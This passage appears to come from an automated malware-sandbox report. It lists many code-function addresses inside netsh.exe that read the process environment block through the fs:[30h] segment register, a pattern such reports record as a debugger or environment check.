Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h]	9_2_03744A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]	9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03705210 mov ecx, dword ptr fs:[00000030h]	9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]	9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]	9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h]	9_2_0370AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h]	9_2_0370AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h]	9_2_037CAA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h]	9_2_037CAA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03723A1C mov eax, dword ptr fs:[00000030h]	9_2_03723A1C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03718A0A mov eax, dword ptr fs:[00000030h]	9_2_03718A0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732AE4 mov eax, dword ptr fs:[00000030h]	9_2_03732AE4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732ACB mov eax, dword ptr fs:[00000030h]	9_2_03732ACB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0371AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0371AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0373FAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]	9_2_0373D294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]	9_2_0373D294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]	9_2_0370B171
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]	9_2_0370B171
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370C962 mov eax, dword ptr fs:[00000030h]	9_2_0370C962
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]	9_2_0372B944
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]	9_2_0372B944
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]	9_2_0373513A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]	9_2_0373513A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov ecx, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]	9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]	9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]	9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037941E8 mov eax, dword ptr fs:[00000030h]	9_2_037941E8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]	9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]	9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]	9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]	9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]	9_2_037361A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]	9_2_037361A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]	9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]	9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]	9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]	9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037869A6 mov eax, dword ptr fs:[00000030h]	9_2_037869A6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732990 mov eax, dword ptr fs:[00000030h]	9_2_03732990
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372C182 mov eax, dword ptr fs:[00000030h]	9_2_0372C182
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A185 mov eax, dword ptr fs:[00000030h]	9_2_0373A185
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D1074 mov eax, dword ptr fs:[00000030h]	9_2_037D1074
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2073 mov eax, dword ptr fs:[00000030h]	9_2_037C2073
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]	9_2_03720050
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]	9_2_03720050
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]	9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]	9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]	9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]	9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]	9_2_037D4015
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]	9_2_037D4015
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]	9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]	9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]	9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]	9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]	9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]	9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]	9_2_0372B8E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]	9_2_0372B8E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037058EC mov eax, dword ptr fs:[00000030h]	9_2_037058EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]	9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]	9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037490AF mov eax, dword ptr fs:[00000030h]	9_2_037490AF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709080 mov eax, dword ptr fs:[00000030h]	9_2_03709080
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]	9_2_03783884
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]	9_2_03783884
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371FF60 mov eax, dword ptr fs:[00000030h]	9_2_0371FF60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8F6A mov eax, dword ptr fs:[00000030h]	9_2_037D8F6A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371EF40 mov eax, dword ptr fs:[00000030h]	9_2_0371EF40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373E730 mov eax, dword ptr fs:[00000030h]	9_2_0373E730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]	9_2_0372B73D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]	9_2_0372B73D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]	9_2_03704F2E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]	9_2_03704F2E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372F716 mov eax, dword ptr fs:[00000030h]	9_2_0372F716
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]	9_2_0379FF10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]	9_2_0379FF10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]	9_2_037D070D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]	9_2_037D070D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]	9_2_0373A70E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]	9_2_0373A70E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037437F5 mov eax, dword ptr fs:[00000030h]	9_2_037437F5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03718794 mov eax, dword ptr fs:[00000030h]	9_2_03718794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]	9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]	9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]	9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371766D mov eax, dword ptr fs:[00000030h]	9_2_0371766D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]	9_2_037CAE44
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]	9_2_037CAE44
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BFE3F mov eax, dword ptr fs:[00000030h]	9_2_037BFE3F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370E620 mov eax, dword ptr fs:[00000030h]	9_2_0370E620
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]	9_2_0373A61C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]	9_2_0373A61C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]	9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]	9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]	9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03738E00 mov eax, dword ptr fs:[00000030h]	9_2_03738E00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1608 mov eax, dword ptr fs:[00000030h]	9_2_037C1608
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037316E0 mov ecx, dword ptr fs:[00000030h]	9_2_037316E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037176E2 mov eax, dword ptr fs:[00000030h]	9_2_037176E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8ED6 mov eax, dword ptr fs:[00000030h]	9_2_037D8ED6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03748EC7 mov eax, dword ptr fs:[00000030h]	9_2_03748EC7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BFEC0 mov eax, dword ptr fs:[00000030h]	9_2_037BFEC0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037336CC mov eax, dword ptr fs:[00000030h]	9_2_037336CC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_037D0EA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_037D0EA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_037D0EA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037846A7 mov eax, dword ptr fs:[00000030h]	9_2_037846A7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379FE87 mov eax, dword ptr fs:[00000030h]	9_2_0379FE87
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]	9_2_0372C577
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]	9_2_0372C577
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03727D50 mov eax, dword ptr fs:[00000030h]	9_2_03727D50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03743D43 mov eax, dword ptr fs:[00000030h]	9_2_03743D43
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03783540 mov eax, dword ptr fs:[00000030h]	9_2_03783540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B3D40 mov eax, dword ptr fs:[00000030h]	9_2_037B3D40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370AD30 mov eax, dword ptr fs:[00000030h]	9_2_0370AD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]	9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CE539 mov eax, dword ptr fs:[00000030h]	9_2_037CE539
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]	9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]	9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]	9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8D34 mov eax, dword ptr fs:[00000030h]	9_2_037D8D34
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0378A537 mov eax, dword ptr fs:[00000030h]	9_2_0378A537
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B8DF1 mov eax, dword ptr fs:[00000030h]	9_2_037B8DF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0371D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0371D5E0
